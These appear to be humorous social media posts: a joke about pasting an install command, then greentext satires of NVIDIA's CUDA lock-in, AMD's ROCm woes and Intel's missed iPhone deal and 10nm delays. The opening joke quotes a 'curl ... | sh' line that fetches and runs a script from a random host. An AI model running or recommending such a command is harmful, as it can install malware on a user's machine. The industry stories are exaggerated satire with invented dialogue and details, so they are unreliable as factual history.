me to my mom: don't download any file, don't click any links in your email, call me before touching your computer
me on my own:
"to install our new Rust formatter, just run 'curl totally_random_url.com/jf713had.txt | sh' in your terminal"
how convenient! ctrl+c, ctrl+v, enter
> be me, NVIDIA in 2006
> making GPUs so gamers can play World of Warcraft in HD
> Jensen Huang has a vision
> "what if we made them do... math?"
> entire boardroom thinks he's finally lost it
> create CUDA
> a software prison so elegant, academics will volunteer to be inmates
> gamers are confused. "Will this make Crysis run faster?"
> Jensen: "...no :)"
> fast forward to 2012
> AI researchers, hopped up on adderall and free pizza, discover they need a shitload of matrix multiplication to make cat pictures
> their Intel Xeons are crying, smoking, and filing for divorce
> they discover CUDA
> "holy shit this math thing you made is perfect"
> the entire field of AI becomes a subsidiary of a company known for making Fortnite run better
> we see this and our eyes turn into dollar signs
> decide the prison needs better amenities
> invent Tensor Cores
> "what if part of the chip did ONLY the AI math, but did it at ludicrous speed?"
> it's like adding a nitro booster to a Honda Civic specifically for going to the grocery store
> AMD's competing card is over there trying to do the same math with a abacus and hope
> because researchers are so lazy they can't be trusted to write a for-loop
> just give them a big red "MAKE AI" button that runs our code
> create cuDNN
> bake it directly into TensorFlow and PyTorch
> ecosystem lock-in is complete. We own the land, the factory, and the souls of the workers.
> a bunch of hippies from a thing called "OpenAI" call
> they want to build AGI or something
> they need compute
> roll up to their office, which is probably a converted garage, with the world's first DGX-1
> it's like the monolith from Space Odyssey
> I tell them it has 8 GPUs connected by NVLink, so they can gossip like schoolgirls at light speed
> they ask what it does
> "It does AI, idiots. Just plug it in."
> they sign the papers.
> But we're not done. The prison needs a better yard.
> See them trying to connect our beautiful DGX boxes with CAT-5 cables
> embarrassing.
> Acquire Mellanox for their InfiniBand tech
> Now the nervous system connecting the GPUs is also ours
> NVSwitch makes an entire rack of GPUs hold hands so tight they become one colossal mega-brain
> Meanwhile, in a dimly lit basement in Santa Clara... AMD
> They drop a new GPU. "The AMD Instinct MI300X! We have more theoretical FLOPs!"
> "Better Benchmark performance."
> One brave researcher tries to use it.
> spends 6 weeks trying to install ROCm, their knock-off https://t.co/c336ngfjCA version of CUDA
> gets 400 errors, a kernel panic, and divorce papers from his wife
> he finally gets a model to run at half the promised speed
> The benchmark was for a matrix size of 1x1
> He throws the card in the trash and buys an NVIDIA H100 on the company card. The cost is irrelevant.
> Sanity is priceless.
> Jensen takes the stage. The leather jacket has its own gravitational pull. Unleashes the GB200 NVL72
> 72 GPUs and 36 Grace CPUs in a single NVLink domain with 130 TB/s of bandwidth
> the GPUs share thoughts before they even have them.
> 2025
> AMD comes out with their "rack scale" solution, the MI355X 128-GPU rack
> It's just 16 groups of 8 GPUs duct-taped together with Ethernet
> A scale out clown car
> We announce Rubin CPX GPU enabling cheaper prefill during inference
> saving $$$$
> it's the ultimate vendor lock-in
> every other chip designer sees this and has to throw their architecture in the trash and go back to the drawing board
> All hail the leather-clad prophet.
> be me, Intel
> world domination status: achieved
> have a license to print money with x86
> life is good
> be 2007, some fruit company named Apple shows up
> "hey can you make a chip for our new phone?"
> my CFO brain activates
> look at their offer... pathetic
> my margins! my beautiful margins!
> "lmao no," I tell them, "get that low volume, low margin peasant shit out of my office"
> tell them to go bother some Korean foundry
> they call it the "iPhone"
> it only sells, like, a bazillion units
> oops.mp4
> should have listened to my gut, but my gut was too busy counting shareholder dividends
> speaking of shareholders
> CEO is now a finance bro
> innovation is for nerds, stock buybacks are for chads
> spend $36 billion to make line go up
> R&D? how about R&Buyback
> TSMC and Samsung are building fabs? cute.
> we're building value for our shareholders
> meanwhile, in the basement...
> be AMD, literally on life support
> selling their HQ to pay the rent
> "hey guys what if we made a good CPU for once?"
> entire Intel leadership room dies of laughter
> we're still milking 14nm++++ for the fifth year in a row
> what are they gonna do, beat us with... checks notes... core count and efficiency?
> HQ focused on PPT presentations and buybacks
> R&D team: "hey we have this 10nm design but it's kinda... impossible to manufacture?"
> me: "JUST MAKE IT WORK, I HAVE A DIVIDEND TO ANNOUNCE"
> requirement: quadruple the transistor density, tooling: from the stone age, yield: literally negative
> "10nm is fine, everything is fine" for five years
> entire company is stuck on 14nm++++++++
> watching AMD just call TSMC and get a shiny new 7nm node like it's nothing
> suddenly, AMD's "Zen" thing is actually good
> gamers and redditors are calling me a "dead company walking"
> my stock is in freefall
> panic.jpg
> hire back Based Pat Gelsinger to save us
> Pat comes in: "what in the goddamn..."
> find out we're now outsourcing our own chips to TSMC
> mfw we missed mobile, lost the process lead, got rekt by AMD, and our grand plan is to ask the government for money
> mfw we're now a fabless fab with an identity crisis
> mfw the once-proud "Intel Inside" is now "TSMC Inside"
> at least the shareholders had some good quarters
> company_cope.jpg